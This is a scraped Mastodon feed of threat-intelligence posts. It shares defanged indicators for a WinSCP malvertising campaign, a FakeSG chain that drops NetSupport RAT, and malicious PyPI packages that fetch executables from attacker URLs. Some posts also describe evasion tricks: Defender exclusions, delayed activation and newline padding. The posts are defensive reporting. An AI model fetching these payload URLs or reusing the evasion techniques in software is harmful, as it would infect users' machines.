rel="nofollow noopener noreferrer" target="_blank">#<span>abuseCH</span></a> <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a></p>
Colin Cowie<p>WinSCP is a popular target for malware campaign abusing google ads. Here's one from this morning:</p><p>1. Google search for winscp<br>2. Click the first link, user redirection<br>➡️ winscp-eng[.]org<br>➡️ winscp-static-746341.c.cdn77[.]org<br>3. Button click, malware download<br>➡️ https[:]//parsecworks[.]org/us/downloads/WinSCP-6.1.2-Setup.exe </p><p><a href="https://www.virustotal.com/gui/file/b503e810b31151f8d79bc0db2b46daddc53f27a2fd741c30355726892591e5b3/detection" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">virustotal.com/gui/file/b503e8</span><span class="invisible">10b31151f8d79bc0db2b46daddc53f27a2fd741c30355726892591e5b3/detection</span></a></p><p><a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://infosec.exchange/tags/malvertising" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malvertising</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a></p>
Nnubes256<p>Hello infosec.exchange! Here's an <a href="https://infosec.exchange/tags/introduction" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>introduction</span></a>. I am currently an <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> student on <a href="https://infosec.exchange/tags/europe" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>europe</span></a> starting research on <a href="https://infosec.exchange/tags/obd2" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>obd2</span></a> dongles, but sometimes I also do <a href="https://infosec.exchange/tags/threathunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threathunting</span></a>, <a href="https://infosec.exchange/tags/reverseengineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>reverseengineering</span></a> and <a href="https://infosec.exchange/tags/ctf" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ctf</span></a> for the thrill.</p><p>I wanna use this account to talk and ask questions to the wider community. I may also share <a href="https://infosec.exchange/tags/iocs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iocs</span></a> of ongoing campaigns from time to time. I also have a main account (<span class="h-card" translate="no"><a href="https://mas.to/@Nnubes256" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>Nnubes256@mas.to</span></a></span>) for more general stuff; I'm just moving my <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> presence where the action is :D</p>
Jérôme Segura<p><a href="https://infosec.exchange/tags/FakeSG" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>FakeSG</span></a>/#RogueRaticate leading to <a href="https://infosec.exchange/tags/netsupportrat" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>netsupportrat</span></a> </p><p>ebodyfit[.]com/wp-content/uploads/ultimatemember/58/downloading-(114.0.522735.199%20(Official%20Build).url</p><p>ebodyfit[.]com/wp-content/uploads/ultimatemember/57/consciousnessx.hta</p><p>ebodyfit[.]com/wp-content/uploads/ultimatemember/56/housealba.zip</p><p>ebodyfit[.]com/wp-content/uploads/ultimatemember/56/clients32.exe</p><p><a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a></p>
dubbel<p>Reported malicious python package "colors5", downloading an executable on setup from<br>https://resetname.peanutgamerdot.repl[.]co/Built.exe</p><p>It's the best documented malicious package I've seen, with helpful comments like</p><p># write the malware to a file<br># attempt to add a windows defender exclusion if the person runs our batch as admin<br><a href="https://mstdn.io/tags/run" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>run</span></a> the malware</p><p>The only attempt at evasion is the screen-full of newlines before this code. :blob_confused: </p><p><a href="https://mstdn.io/tags/python" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>python</span></a> <a href="https://mstdn.io/tags/PyPI" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>PyPI</span></a> <a href="https://mstdn.io/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> <a href="https://mstdn.io/tags/IoCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IoCs</span></a> <a href="https://mstdn.io/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a></p>
dubbel<p>Just when I had figured out what the malicious python package "urllib33" did and wanted to report it, I noticed that it was already removed - great work by somebody! (<90min!)</p><p>This society critic downloads an exe from https://fucksociety.8443[.]ml/download/setup.exe - but only starting tomorrow. First time I see this technique on pypi, that aims to evade the initial scans. It also uses the Windows Registry - maybe for persistence?</p><p><a href="https://mstdn.io/tags/Python" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Python</span></a> <a href="https://mstdn.io/tags/PyPI" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>PyPI</span></a> <a href="https://mstdn.io/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a> <a href="https://mstdn.io/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://mstdn.io/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a></p>
ExploreLive feeds
Mastodon is the best way to keep up with what's happening.
Follow anyone across the fediverse and see it all in chronological order. No algorithms, ads, or clickbait in sight.
Create accountLoginDrag & drop to upload